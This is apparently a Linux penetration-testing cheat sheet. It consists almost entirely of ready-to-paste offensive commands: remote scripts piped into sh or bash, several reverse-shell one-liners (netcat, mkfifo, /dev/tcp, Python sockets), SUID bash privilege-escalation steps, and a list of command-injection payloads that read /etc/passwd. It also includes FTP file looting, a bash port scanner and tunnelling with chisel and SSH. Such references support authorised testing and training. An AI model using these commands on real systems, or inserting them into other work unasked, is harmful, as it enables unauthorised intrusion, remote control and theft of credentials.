Sudo
Enumeration
Script
LinPeas
Copy curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh Linux Smart Enumeration
Copy curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh
chmod +x lse.sh
./lse.sh -l1 Metasploit
Copy msfconsole -q -x 'use exploit; set RHOSTS ip; set RPORT port; run; exit' Docker
Copy curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -O File
Classic
/etc/passwd & /etc/shadow
/www/html ꞏ /var/www ꞏ /srv/html ꞏ /usr/share/*
/etc/nginx/sites-available/default
/etc/apache2/sites-enabled/000-default.conf
Proc
/proc/ contains useful information about the processes that are currently running
Link to the current working directory.
Values of environment variables.
Link to the executable of this process.
Directory, which contains all file descriptors.
Command
Copy find / -user user 2>& -
find / -group group 2>& -
find / -user root -executable -type f 2>& - | grep -v /bin/ Reverse Shell
Server
reSH
Copy # Client
resh ip 4444
# Server
resh 4444 Source
Netcat
Copy nc ip 4444 -e /bin/bash Mkfifo
Copy mkfifo /tmp/f ; nc ip 4444 0 < /tmp/f | /bin/sh -i 2>&1| tee /tmp/f Dev
Copy bash -c 'bash -i >& /dev/tcp/ip/4444 0>&1'" Python
Copy python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' TTY Support
Copy python3 -c 'import pty; pty.spawn("/bin/bash")'
Copy script -qc /bin/bash /dev/null rlwrap
rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. For when you cannot spawn a proper TTY source
Copy # Receiving connection from a reverse shell
rlwrap nc -lnvp port
# Connecting to the victim
rlwrap nc ip port
# Add actual bash history and to put all words seen on in- and output on the completion list.
rlwrap nc -r -f . nc ip port source
Privilege Escalation
Copy /bin/cp /bin/bash /tmp/bash_up ; /bin/chown user:group /tmp/bash_up ; chmod g+s /tmp/bash_up ; chmod u+s /tmp/bash_up
/tmp/bash_up -p
Copy chmod 4755 /bin/bash
bash -p FTP
Port: 21
File transfer protocol (FTP) is an Internet tool provided by TCP/IP. It helps to transfer files from one computer to another by providing access to directories or folders on remote computers
Scan
Copy nmap --script ftp-* -p 21 ip Download all files
Copy wget -m --user=user --password=fpassword ftp://ip
Copy wget -m --user=anonymous --password=anonymous ftp://ip Gdbserver
Port: 1337
Gdbserver is a computer program that makes it possible to remotely debug other programs. You need to have a copy of the program you want to debug put onto the target system.
Copy $ gdb
(gdb) target extended-remote ip:port
(gdb) remote get remote_file local_file
(gdb) remote put local_file remote_file Command Injection
Copy ;{cat,/etc/passwd}
; cat$ {IFS} /etc/passwd ;
; cat /etc/passwd ;
$(cat /etc/passwd )
` cat /etc/passwd `
&& cat /etc/passwd &&
|| cat /etc/passwd ||
< <( cat /etc/passwd )
| cat /etc/passwd
"; cat /etc/passwd " GTFOBins - Bypass local security restrictions
Network
Netstat
Scan Port
Copy for port in { 1..65535} ; do echo > /dev/tcp/ip/ $port && echo "$port open" ; done 2> /dev/null Scan Ip
Copy for i in { 1..254} ; do ( ping -c 1 192.168.1. ${i} | grep "bytes from" | grep -v "Unreachable" & ); done ; Port Forwarding
Chisel
Copy # Install chisel
curl https://i.jpillora.com/chisel! | bash
Copy # Example: 8000 -> 4444
# Attacker machine:
chisel server -p 4444 --reverse
# Victim machine:
chisel client ip-server:4444 R:8000:127.0.0.1:8000 SSH
Copy ssh -L 8080:127.0.0.1:8080 user@ip SCP
Download File
Copy scp -P port user@192.168.1.ip:path . Upload File
Copy scp -P port file user@192.168.1.ip:path Upload peda
Copy scp -P 22 -r ~/.peda user@192.168.1.ip:/tmp/peda 